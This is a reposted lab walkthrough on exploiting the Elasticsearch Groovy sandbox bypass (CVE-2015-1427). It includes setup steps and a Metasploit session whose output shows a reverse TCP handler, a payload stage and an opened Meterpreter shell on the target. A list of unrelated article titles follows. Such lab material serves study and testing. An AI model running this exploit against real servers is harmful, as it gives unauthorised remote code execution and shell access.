Lab - ElasticSearch Search Groovy Sandbox Bypass
来源:互联网 发布:软件生命周期管理 编辑:程序博客网 时间:2024/05/02 02:02
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0
Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.
Install
Please read the page.
elasticsearch can be started using:
$ bin/elasticsearch
On *nix systems, the command will start the process in the foreground.
Running as a daemon
To run it in the background, add the -d switch to it:
$ bin/elasticsearch -d
PID
The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:
$ bin/elasticsearch -d -p pid $ kill `cat pid`
Exploit
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
msf exploit(search_groovy_script) > show options Module options (exploit/multi/elasticsearch/search_groovy_script): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.1.102 yes The target address RPORT 9200 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The path to the ElasticSearch REST API VHOST no HTTP server virtual hostExploit target: Id Name -- ---- 0 ElasticSearch 1.4.2msf exploit(search_groovy_script) > run [*] Started reverse TCP handler on 192.168.1.100:4444 [*] Checking vulnerability...[*] Discovering TEMP path...[+] TEMP path on '/tmp'[*] Discovering remote OS...[+] Remote OS is 'Linux'[*] Trying to load metasploit payload...[*] Sending stage (46112 bytes) to 192.168.1.102[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800[+] Deleted /tmp/rCrwvV.jarmeterpreter > sysinfo Computer : labOS : Linux 4.3.0-kali1-686-pae (i386)Meterpreter : java/javameterpreter >
References
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
http://drops.wooyun.org/papers/5107
- Lab - ElasticSearch Search Groovy Sandbox Bypass
- How to Bypass Search Page
- 打开elasticsearch groovy inline
- 10 Effective Methods To Bypass The Google Sandbox(被google sandbox困扰的请看这篇文章)
- elasticsearch 安装search guard
- elasticsearch & search guard
- elasticsearch之Search API
- [ElasticSearch]Search之分页
- elasticsearch.net search使用指南
- Elasticsearch开启groovy动态语言支持
- Elasticsearch使用Groovy脚本报错
- Elasticsearch 1.7.3 groovy are disabled
- Sandbox
- Sandbox
- sandbox
- elasticsearch---search in depth之struct search
- Elasticsearch / Marvel {search rate & search latency }
- 实战 Groovy(1)-Twitter Search API
- 12星座男生最吃哪一套
- 对象序列化
- Emacs 行号显示及跳转到制定的行号
- 自考《信息资源管理》概括
- 01.1android Service的概念及作用
- Lab - ElasticSearch Search Groovy Sandbox Bypass
- sgu194. Reactor Cooling 无源汇上下界可行流
- SqlServer数据库升级及常用配置
- 批次特性获取
- 滑动窗口协议
- 关于《海量用户积分算法探讨》的读后总结和扩展
- 值得一提:关于 HDFS 的 file size 和 block size
- Tsinsen-A1101格子问题(考查格子行列斜的规律)
- 01.2异步服务IntentService